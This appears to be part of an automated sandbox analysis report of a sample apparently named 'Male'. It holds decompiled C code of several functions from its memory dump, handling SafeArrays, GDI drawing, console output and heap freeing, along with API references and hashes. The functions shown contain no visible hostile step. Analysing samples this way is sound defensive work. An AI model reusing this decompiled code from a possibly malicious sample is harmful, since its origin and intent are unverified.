				_t180 = _a4;
				_t151 = __ecx;
				_t97 =  *_t180 & 0x0000ffff;
				if((_t97 & 0x00002000) == 0) {
					L44:
					__eflags = 0;
					return 0;
				}
				_t181 = _t180[4];
				_v16 = _t181;
				if((_t97 & 0x00004000) != 0) {
					_t181 =  *_t181;
					_v16 = _t181;
				}
				_t195 = _t181;
				if(_t181 == 0) {
					goto L44;
				} else {
					E013B491D(_t156);
					_t187 =  *_t151;
					E013C3900(_t187, _t181, _t195);
					 *( *_t187 + 0x210) =  *( *_t187 + 0x210) & 0x00000000;
					_t102 =  *_t181;
					_a4 = _t102;
					if(_t102 <= 0) {
						L8:
						E013B47F0(_t197,  *_t151, 0);
						_t188 =  *_t151;
						E0140FDED(_t188, 2);
						_t105 =  *_t188;
						_t189 =  *(_t105 + 8);
						_v20 =  *((intOrPtr*)(_t105 + 4));
						_t18 = _t181 + 2; // 0x5c61745
						_t162 =  *_t18 & 0x0000ffff;
						_t107 = _t162 & 0x00000f00;
						if(_t107 == 0x100) {
							_t108 =  &_v36;
							__imp__#23(_t181, _t108);
							__eflags = _t108;
							if(_t108 < 0) {
								L18:
								return 1;
							}
							_t152 = 0;
							__eflags = _t189;
							if(__eflags <= 0) {
								L17:
								__imp__#24(_t181);
								goto L18;
							}
							_t182 = _v20;
							do {
								_push(0x10);
								_t110 = E013D01FB(_t189, __eflags);
								 *_t110 =  *_t110 & 0x00000000;
								_t110[2] = _t110[2] & 0x00000000;
								_t110[3] = 1;
								 *(_t182 + _t152 * 4) = _t110;
								_t111 = 8;
								_v56 = _t111;
								_v48 =  *((intOrPtr*)(_v36 + _t152 * 4));
								E01421570( *(_t182 + _t152 * 4), _t178,  &_v56);
								_t152 = _t152 + 1;
								__eflags = _t152 - _t189;
							} while (__eflags < 0);
							L50:
							_t181 = _v16;
							goto L17;
						}
						if(_t107 == 0x200) {
							L43:
							E013BD720(_t151);
							goto L44;
						}
						if(_t107 == 0x400) {
							_t117 =  &_v32;
							__imp__#23(_t181, _t117);
							__eflags = _t117;
							if(_t117 < 0) {
								goto L18;
							}
							_t153 = 0;
							__eflags = _t189;
							if(__eflags <= 0) {
								goto L17;
							}
							_t183 = _v20;
							do {
								_push(0x10);
								_t118 = E013D01FB(_t189, __eflags);
								 *_t118 =  *_t118 & 0x00000000;
								_t118[2] = _t118[2] & 0x00000000;
								_t118[3] = 1;
								 *(_t183 + _t153 * 4) = _t118;
								_t119 = 9;
								_v56 = _t119;
								_v48 = _v32 + _t153 * 4;
								E01421570( *(_t183 + _t153 * 4), _t178,  &_v56);
								_t153 = _t153 + 1;
								__eflags = _t153 - _t189;
							} while (__eflags < 0);
							goto L50;
						}
						if(_t107 == 0x800) {
							_t124 =  &_v28;
							__imp__#23(_t181, _t124);
							__eflags = _t124;
							if(_t124 < 0) {
								goto L18;
							}
							_t154 = 0;
							__eflags = _t189;
							if(_t189 <= 0) {
								goto L17;
							}
							_t184 = 0;
							__eflags = 0;
							do {
								_push(0x10);
								_t125 = E013D01FB(_t189, __eflags);
								 *_t125 =  *_t125 & 0x00000000;
								_t125[2] = _t125[2] & 0x00000000;
								_t125[3] = 1;
								 *(_v20 + _t154 * 4) = _t125;
								_v56 = 0x400c;
								_v48 = _v28 + _t184;
								E01421570( *(_v20 + _t154 * 4), _t178,  &_v56);
								_t154 = _t154 + 1;
								_t184 = _t184 + 0x10;
								__eflags = _t154 - _t189;
							} while (__eflags < 0);
							goto L50;
						}
						if(_t162 >= 0) {
							goto L43;
						}
						__imp__#77(_t181,  &_a4);
						_t171 = _a4;
						_t133 = (_t171 & 0x0000ffff) + 0xfffffffe;
						if(_t133 > 0x15) {
							L22:
							_t134 = _t171 & 0x0000ffff;
							__eflags = _t134 & 0x00004000;
							if((_t134 & 0x00004000) == 0) {
								goto L43;
							}
							L23:
							_push(4);
							L24:
							_pop(_t155);
							L25:
							_t135 =  &_v12;
							__imp__#23(_t181, _t135);
							__eflags = _t135;
							if(_t135 < 0) {
								goto L18;
							}
							_v24 = _v24 & 0x00000000;
							__eflags = _t189;
							if(__eflags <= 0) {
								goto L17;
							}
							_t185 = _v24;
							do {
								_push(0x10);
								_t136 = E013D01FB(_t189, __eflags);
								 *_t136 =  *_t136 & 0x00000000;
								_t136[2] = _t136[2] & 0x00000000;
								_t136[3] = 1;
								 *(_v20 + _t185 * 4) = _t136;
								_t174 = _a4;
								_t137 = _t174 & 0x0000ffff;
								__eflags = 0x00004000 & _t137;
								if((0x00004000 & _t137) == 0) {
									_t139 = 0x00004000 | _t174;
									__eflags = _t139;
									_v56 = _t139;
									_v48 = _v12;
								} else {
									_v56 = _t174;
									E013D1240( &_v48, _v12, _t155);
									_t191 = _t191 + 0xc;
								}
								E01421570( *(_v20 + _t185 * 4), 0x4000,  &_v56);
								_v12 = _v12 + _t155;
								_t185 = _t185 + 1;
								__eflags = _t185 - _t189;
							} while (__eflags < 0);
							goto L50;
						}
						_t21 = _t133 + 0x1421d38; // 0x50990c8b
						switch( *((intOrPtr*)(( *_t21 & 0x000000ff) * 4 +  &M01421D20))) {
							case 0:
								_push(2);
								goto L24;
							case 1:
								goto L23;
							case 2:
								_push(8);
								goto L24;
							case 3:
								goto L25;
							case 4:
								_t147 =  &_v12;
								_push(_t147);
								_push(_t181);
								__imp__#23();
								_t204 = _t147;
								if(_t147 < 0) {
									goto L43;
								}
								E013D1240(E01421716(_t151, _t181, _t204, _t189), _v12, _t189);
								goto L17;
							case 5:
								goto L22;
						}
					}
					_t12 = _t181 + 0x10; // 0x10
					_t190 = _t12;
					_t186 = _t102;
					do {
						E013B48CD( *_t151,  *_t190);
						_t190 = _t190 + 8;
						_t186 = _t186 - 1;
						_t197 = _t186;
					} while (_t186 != 0);
					_t181 = _v16;
					goto L8;
				}
			}

0x01421a18
0x01421a21
0x01421a24
0x01421a26
0x01421a2e
0x01421cb3
0x01421cb3
0x00000000
0x01421cb3
0x01421a34
0x01421a37
0x01421a3f
0x01421a41
0x01421a43
0x01421a43
0x01421a46
0x01421a48
0x00000000
0x01421a4e
0x01421a4e
0x01421a53
0x01421a57
0x01421a5e
0x01421a65
0x01421a68
0x01421a6d
0x01421a88
0x01421a8c
0x01421a91
0x01421a99
0x01421a9e
0x01421aa3
0x01421aa6
0x01421aa9
0x01421aa9
0x01421aaf
0x01421ab9
0x01421cbc
0x01421cc1
0x01421cc7
0x01421cc9
0x01421b3f
0x00000000
0x01421b3f
0x01421ccf
0x01421cd1
0x01421cd3
0x01421b38
0x01421b39
0x00000000
0x01421b39
0x01421cd9
0x01421cdc
0x01421cdc
0x01421cde
0x01421ce6
0x01421ce9
0x01421ced
0x01421cf4
0x01421cf7
0x01421cf8
0x01421d02
0x01421d0c
0x01421d11
0x01421d12
0x01421d12
0x01421d16
0x01421d16
0x00000000
0x01421d16
0x01421ac4
0x01421cac
0x01421cae
0x00000000
0x01421cae
0x01421acf
0x01421c50
0x01421c55
0x01421c5b
0x01421c5d
0x00000000
0x00000000
0x01421c63
0x01421c65
0x01421c67
0x00000000
0x00000000
0x01421c6d
0x01421c70
0x01421c70
0x01421c72
0x01421c7a
0x01421c7d
0x01421c81
0x01421c88
0x01421c8b
0x01421c8c
0x01421c96
0x01421ca0
0x01421ca5
0x01421ca6
0x01421ca6
0x00000000
0x01421caa
0x01421ada
0x01421beb
0x01421bf0
0x01421bf6
0x01421bf8
0x00000000
0x00000000
0x01421bfe
0x01421c00
0x01421c02
0x00000000
0x00000000
0x01421c08
0x01421c08
0x01421c0a
0x01421c0a
0x01421c0c
0x01421c15
0x01421c18
0x01421c1c
0x01421c23
0x01421c2b
0x01421c34
0x01421c3e
0x01421c43
0x01421c44
0x01421c47
0x01421c47
0x00000000
0x01421c4b
0x01421ae2
0x00000000
0x00000000
0x01421aed
0x01421af3
0x01421afa
0x01421b00
0x01421b53
0x01421b53
0x01421b56
0x01421b5b
0x00000000
0x00000000
0x01421b61
0x01421b61
0x01421b63
0x01421b63
0x01421b64
0x01421b64
0x01421b69
0x01421b6f
0x01421b71
0x00000000
0x00000000
0x01421b73
0x01421b77
0x01421b79
0x00000000
0x00000000
0x01421b7b
0x01421b7e
0x01421b7e
0x01421b80
0x01421b8e
0x01421b91
0x01421b95
0x01421b9c
0x01421b9f
0x01421ba3
0x01421ba6
0x01421ba8
0x01421bc2
0x01421bc2
0x01421bc5
0x01421bcc
0x01421baa
0x01421bb1
0x01421bb6
0x01421bbb
0x01421bbb
0x01421bd9
0x01421bde
0x01421be1
0x01421be2
0x01421be2
0x00000000
0x01421be6
0x01421b02
0x01421b09
0x00000000
0x01421b4b
0x00000000
0x00000000
0x00000000
0x00000000
0x01421b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x01421b10
0x01421b13
0x01421b14
0x01421b15
0x01421b1b
0x01421b1d
0x00000000
0x00000000
0x01421b30
0x00000000
0x00000000
0x00000000
0x00000000
0x01421b09
0x01421a6f
0x01421a6f
0x01421a72
0x01421a74
0x01421a78
0x01421a7d
0x01421a80
0x01421a80
0x01421a80
0x01421a85
0x00000000
0x01421a85

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 01421AED
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01421B15
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 01421B39
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01421B69
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01421BF0
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01421C55
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01421CC1

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 33bf48999ba90744f064beb0257dd1d6fdf68e812030a50eb541446a53e4b174
Instruction ID: 8c7b3eca3d537d370342c6755a9f1d86cb0b90d3f652e6762cb454d6745d725a
Opcode Fuzzy Hash: 33bf48999ba90744f064beb0257dd1d6fdf68e812030a50eb541446a53e4b174
Instruction Fuzzy Hash: E8910779E002299FDB01DF99C484BFEBBB4FF15B14F54402AE611E72A1E774A982CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013B1CD3, Relevance: 10.8, APIs: 7, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E013B1CD3(intOrPtr __fp0, struct HDC__* _a4, intOrPtr _a8) {
				char _v5;
				int _v12;
				int _v16;
				int* _v20;
				float _v24;
				signed int _v28;
				long* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long _v44;
				intOrPtr _v48;
				intOrPtr _v80;
				void* __edi;
				void* __esi;
				long _t115;
				intOrPtr _t119;
				signed int _t120;
				int _t121;
				void* _t123;
				intOrPtr _t124;
				int _t126;
				void* _t129;
				int _t131;
				int _t133;
				int _t139;
				void* _t140;
				int _t148;
				void* _t149;
				void* _t167;
				struct HDC__* _t168;
				struct HDC__* _t170;
				float _t172;
				int _t173;
				int* _t180;
				int _t186;
				int _t190;
				intOrPtr* _t191;
				intOrPtr _t195;
				intOrPtr _t196;

				_t195 = __fp0;
				_t168 = _a4;
				_t115 = 0;
				_v5 = 0;
				_t185 = 1;
				_v44 = 0;
				_t186 = 0xfffffffe;
				_v12 = _t186;
				_v16 = 1;
				if(_a8 == 0) {
					L3:
					E013B1E0E(_t168, _t186);
					return _v5;
				} else {
					goto L1;
				}
				do {
					L1:
					_v28 = _v28 & 0x00000000;
					E013B1E82(_t185, _t186, _t168, _t115, _t186, 0, _t185);
					_t119 = _a8;
					if( *((intOrPtr*)(_t119 + 0xc)) > 0) {
						_v32 = _t119 + 0x18;
						_t172 = _t119 + 0x14;
						_v24 = _t172;
						_v40 = _t119 + 0x1c;
						_t180 = _t119 + 0x10;
						_v20 = _t180;
						_v36 = _t119 + 0x20;
						do {
							_t185 =  *_t180;
							_t190 =  *_t172;
							_t120 =  *(_t119 + _v28 + 0x810) & 0x000000ff;
							_t170 = _a4;
							__eflags = _t120 - 0x10;
							if(__eflags > 0) {
								_t121 = _t120 - 0x12;
								__eflags = _t121;
								if(_t121 == 0) {
									SetPixel(_t170, _t185, _t190, _v44);
									L35:
									_t180 = _v20;
									_t172 = _v24;
									L11:
									_t186 = _v12;
									L12:
									_t185 = _v16;
									goto L13;
								}
								_t126 = _t121;
								__eflags = _t126;
								if(_t126 == 0) {
									__eflags = _t185;
									if(_t185 != 0) {
										_v5 = 1;
									}
									goto L11;
								}
								_t186 = _v12;
								__eflags = _t126 != 4;
								if(_t126 != 4) {
									goto L12;
								}
								_v16 = _t185;
								goto L13;
							}
							if(__eflags == 0) {
								_t173 = _v16;
								_t129 = _t173 + 1 + _t190;
								_t190 = _t190 - _t173;
								_push(_t129);
								_t131 = _t173 + 1 + _t185;
								_t185 = _t185 - _t173;
								__eflags = _t185;
								L27:
								Rectangle(_t170, _t185, _t190, _t131, ??);
								goto L35;
							}
							_t133 = _t120 - 8;
							__eflags = _t133;
							if(_t133 == 0) {
								_t134 = _v44;
								__eflags = _t134 - 0xffffffff;
								if(_t134 != 0xffffffff) {
									E013B1E0E(_t170, _v12);
									_t185 =  *_v20;
									_t190 =  *_v24;
									_t134 = _v44;
								}
								__eflags = _t185 - 0xffffffff;
								if(_t185 != 0xffffffff) {
									_t134 = _t185;
									_v44 = _t185;
								}
								__eflags = _t190 - 0xffffffff;
								if(_t190 == 0xffffffff) {
									_t186 = _v12;
								} else {
									_v12 = _t190;
								}
								_t185 = _v16;
								E013B1E82(_v16, _t186, _t170, _t134, _t186, 0, _v16);
								_t172 = _v24;
								_t180 = _v20;
								goto L13;
							}
							_t139 = _t133;
							__eflags = _t139;
							if(_t139 == 0) {
								_v28 = _v28 + 1;
								_t140 = 8;
								_v32 = _v32 + _t140;
								_v36 = _v36 + _t140;
								_v40 = _v40 + _t140;
								_v20 = _t180 + _t140;
								_v24 = _t172 + _t140;
								E013B1E0E(_t170, _v12);
								E013B1E82(_t185, _t190, _t170, _v44, _v12, 0, _v16);
								_push( *_v24 + _t190);
								_t131 =  *_v20 + _t185;
								goto L27;
							}
							_t148 = _t139;
							__eflags = _t148;
							if(_t148 == 0) {
								_v28 = _v28 + 1;
								_t149 = 8;
								_v32 = _v32 + _t149;
								_v36 = _v36 + _t149;
								_v40 = _v40 + _t149;
								_v20 = _t180 + _t149;
								_v24 = _t172 + _t149;
								E013B1E0E(_t170, _v12);
								E013B1E82(_t185, _t190, _t170, _v44, _v12, 0, _v16);
								Ellipse(_t170, _t185, _t190,  *_v20 + _t185,  *_v24 + _t190);
								goto L35;
							}
							__eflags = _t148 == 0;
							if(_t148 == 0) {
								MoveToEx(_t170, _t185, _t190, 0);
								asm("fild dword [eax]");
								_v48 = _t195;
								_t196 = _v48;
								_v80 = _t196;
								asm("fild dword [eax]");
								_v48 = _t196;
								_t195 = _v48;
								 *_t191 = _t195;
								AngleArc(_t170, _t185, _t190,  *_v32, _t172, _t172);
								LineTo(_t170, _t185, _t190);
								CloseFigure(_t170);
								_v28 = _v28 + 2;
								_t167 = 0x10;
								_v32 = _v32 + _t167;
								_t180 = _v20 + _t167;
								_v36 = _v36 + _t167;
								_v40 = _v40 + _t167;
								_t172 = _v24 + _t167;
							}
							goto L11;
							L13:
							_v28 = _v28 + 1;
							_t123 = 8;
							_v32 = _v32 + _t123;
							_t180 = _t180 + _t123;
							_v36 = _v36 + _t123;
							_t172 = _t172 + _t123;
							_v40 = _v40 + _t123;
							_t119 = _a8;
							_v20 = _t180;
							_v24 = _t172;
							__eflags = _v28 -  *((intOrPtr*)(_t119 + 0xc));
							_t168 = _a4;
						} while (_v28 <  *((intOrPtr*)(_t119 + 0xc)));
					}
					_t124 =  *((intOrPtr*)(_t119 + 4));
					_a8 = _t124;
					_t115 = _v44;
				} while (_t124 != 0);
				goto L3;
			}

0x013b1cd3
0x013b1cda
0x013b1cdd
0x013b1ce3
0x013b1ce9
0x013b1cea
0x013b1ced
0x013b1cee
0x013b1cf1
0x013b1cf7
0x013b1d1e
0x013b1d20
0x013b1d2c
0x00000000
0x00000000
0x00000000
0x013b1cf9
0x013b1cf9
0x013b1cf9
0x013b1d03
0x013b1d08
0x013b1d0f
0x013b1d32
0x013b1d35
0x013b1d3b
0x013b1d3e
0x013b1d41
0x013b1d47
0x013b1d4a
0x013b1d4d
0x013b1d50
0x013b1d52
0x013b1d54
0x013b1d5c
0x013b1d5f
0x013b1d62
0x013f2fad
0x013f2fad
0x013f2fb0
0x013f2fe3
0x013f2fe9
0x013f2fe9
0x013f2fec
0x013b1d91
0x013b1d91
0x013b1d94
0x013b1d94
0x00000000
0x013b1d94
0x013f2fb3
0x013f2fb3
0x013f2fb6
0x013f2fcc
0x013f2fce
0x013f2fd4
0x013f2fd4
0x00000000
0x013f2fce
0x013f2fb8
0x013f2fbb
0x013f2fbe
0x00000000
0x00000000
0x013f2fc4
0x00000000
0x013f2fc4
0x013b1d68
0x013f2f8f
0x013f2f95
0x013f2f97
0x013f2f99
0x013f2f9d
0x013f2f9f
0x013f2f9f
0x013f2fa1
0x013f2fa5
0x00000000
0x013f2fa5
0x013b1d6e
0x013b1d6e
0x013b1d71
0x013b1dc3
0x013b1dc6
0x013b1dc9
0x013b1dcf
0x013b1dda
0x013b1ddc
0x013b1dde
0x013b1dde
0x013b1de1
0x013b1de4
0x013b1de6
0x013b1de8
0x013b1de8
0x013b1deb
0x013b1dee
0x013b1e09
0x013b1df0
0x013b1df0
0x013b1df0
0x013b1df3
0x013b1dfc
0x013b1e01
0x013b1e04
0x00000000
0x013b1e04
0x013b1d74
0x013b1d74
0x013b1d77
0x013f2f4b
0x013f2f50
0x013f2f54
0x013f2f59
0x013f2f5e
0x013f2f62
0x013f2f65
0x013f2f68
0x013f2f79
0x013f2f85
0x013f2f8b
0x00000000
0x013f2f8b
0x013b1d7e
0x013b1d7e
0x013b1d81
0x013f2efa
0x013f2eff
0x013f2f03
0x013f2f08
0x013f2f0d
0x013f2f11
0x013f2f14
0x013f2f17
0x013f2f28
0x013f2f40
0x00000000
0x013f2f40
0x013b1d88
0x013b1d8b
0x013f2e98
0x013f2ea3
0x013f2ea8
0x013f2eab
0x013f2eae
0x013f2eb2
0x013f2eb7
0x013f2eba
0x013f2ebd
0x013f2ec5
0x013f2ece
0x013f2ed5
0x013f2ee1
0x013f2ee7
0x013f2ee8
0x013f2eeb
0x013f2eed
0x013f2ef0
0x013f2ef3
0x013f2ef3
0x00000000
0x013b1d97
0x013b1d97
0x013b1d9f
0x013b1da0
0x013b1da3
0x013b1da5
0x013b1da8
0x013b1daa
0x013b1dad
0x013b1db0
0x013b1db3
0x013b1db6
0x013b1db9
0x013b1db9
0x013b1dbe
0x013b1d11
0x013b1d16
0x013b1d19
0x013b1d19
0x00000000

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d3ace476cf161ebc15b43fd7bb0932391308ea5ccf6520417a9ca08ab9848b60
Instruction ID: c58e12714e99e52f39a24feb7c4a5ce2f8961db5c6f07ea919f4d1e2319eb834
Opcode Fuzzy Hash: d3ace476cf161ebc15b43fd7bb0932391308ea5ccf6520417a9ca08ab9848b60
Instruction Fuzzy Hash: CD914971E0020AEFDB10CFA8D894AEEBFB8FF48324F144559E615B7251D374AA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013E584E, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E013E584E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x147d014; // 0xf9c9c506
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1481fd8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x1481fd8 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E013E3AE9(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x1481fd8 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x1481fd8 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x1481fd8 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E013E3DE0( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E013E3DE0();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E013D0EAC(_v8 ^ _t136);
			}

0x013e5856
0x013e585d
0x013e5860
0x013e5868
0x013e586c
0x013e5878
0x013e587b
0x013e587e
0x013e5885
0x013e588d
0x013e5890
0x013e5896
0x013e589c
0x013e58a1
0x013e58a3
0x013e58a6
0x013e58ab
0x013e58b5
0x013e58bc
0x013e58bf
0x013e58c6
0x013e58cd
0x013e58f9
0x013e591f
0x013e5921
0x00000000
0x013e58fb
0x013e58fe
0x013e59c5
0x013e59d1
0x013e59dc
0x013e59e1
0x013e5904
0x013e590b
0x013e5910
0x013e5916
0x013e591c
0x00000000
0x013e591c
0x013e5916
0x013e58fe
0x013e58cf
0x013e58d3
0x013e58d6
0x013e58dc
0x013e58de
0x013e58e1
0x013e58e5
0x013e5922
0x013e5925
0x013e5926
0x013e592b
0x013e5931
0x013e5937
0x013e5946
0x013e594c
0x013e5952
0x013e5957
0x013e5973
0x013e59e6
0x013e59ec
0x013e5975
0x013e597d
0x013e5986
0x013e598c
0x00000000
0x013e598e
0x013e5990
0x013e5993
0x013e59ac
0x00000000
0x013e59ae
0x013e59b2
0x013e59b4
0x013e59b7
0x00000000
0x013e59b7
0x013e59b2
0x013e59ac
0x013e598c
0x013e5986
0x013e5973
0x013e5957
0x013e5931
0x00000000
0x013e59ba
0x013e59ba
0x013e59ee
0x013e5a00

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,013E5FC3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 013E5890
__fassign.LIBCMT ref: 013E590B
__fassign.LIBCMT ref: 013E5926
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 013E594C
WriteFile.KERNEL32(?,FF8BC35D,00000000,013E5FC3,00000000,?,?,?,?,?,?,?,?,?,013E5FC3,?), ref: 013E596B
WriteFile.KERNEL32(?,?,00000001,013E5FC3,00000000,?,?,?,?,?,?,?,?,?,013E5FC3,?), ref: 013E59A4

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: a8b0e076ae2b5d78f5ba687671d6e1b02972401dcb666feff0d5368f680f6662
Instruction ID: fcb76cbad8910d8697b131c6b8a16067a10cf083a7b59208845ee80d855e5f2d
Opcode Fuzzy Hash: a8b0e076ae2b5d78f5ba687671d6e1b02972401dcb666feff0d5368f680f6662
Instruction Fuzzy Hash: C351C175E002199FDB20CFA8D849AEEBBF8EF19318F14415AFA55E7291D7309941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013EDBFF, Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013EDBFF(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E013EDBC3(_t45, 7);
					E013EDBC3(_t45 + 0x1c, 7);
					E013EDBC3(_t45 + 0x38, 0xc);
					E013EDBC3(_t45 + 0x68, 0xc);
					E013EDBC3(_t45 + 0x98, 2);
					E013E2DE8( *((intOrPtr*)(_t45 + 0xa0)));
					E013E2DE8( *((intOrPtr*)(_t45 + 0xa4)));
					E013E2DE8( *((intOrPtr*)(_t45 + 0xa8)));
					E013EDBC3(_t45 + 0xb4, 7);
					E013EDBC3(_t45 + 0xd0, 7);
					E013EDBC3(_t45 + 0xec, 0xc);
					E013EDBC3(_t45 + 0x11c, 0xc);
					E013EDBC3(_t45 + 0x14c, 2);
					E013E2DE8( *((intOrPtr*)(_t45 + 0x154)));
					E013E2DE8( *((intOrPtr*)(_t45 + 0x158)));
					E013E2DE8( *((intOrPtr*)(_t45 + 0x15c)));
					return E013E2DE8( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x013edc05
0x013edc0a
0x013edc13
0x013edc1e
0x013edc29
0x013edc34
0x013edc42
0x013edc4d
0x013edc58
0x013edc63
0x013edc71
0x013edc7f
0x013edc90
0x013edc9e
0x013edcac
0x013edcb7
0x013edcc2
0x013edccd
0x00000000
0x013edcdd
0x013edce2

APIs

Part of subcall function 013EDBC3: _free.LIBCMT ref: 013EDBEC

_free.LIBCMT ref: 013EDC4D

Part of subcall function 013E2DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,013EDBF1,?,00000000,?,00000000,?,013EDC18,?,00000007,?,?,013EE016,?), ref: 013E2DFE
Part of subcall function 013E2DE8: GetLastError.KERNEL32(?,?,013EDBF1,?,00000000,?,00000000,?,013EDC18,?,00000007,?,?,013EE016,?,?), ref: 013E2E10

_free.LIBCMT ref: 013EDC58
_free.LIBCMT ref: 013EDC63
_free.LIBCMT ref: 013EDCB7
_free.LIBCMT ref: 013EDCC2
_free.LIBCMT ref: 013EDCCD
_free.LIBCMT ref: 013EDCD8

Memory Dump Source

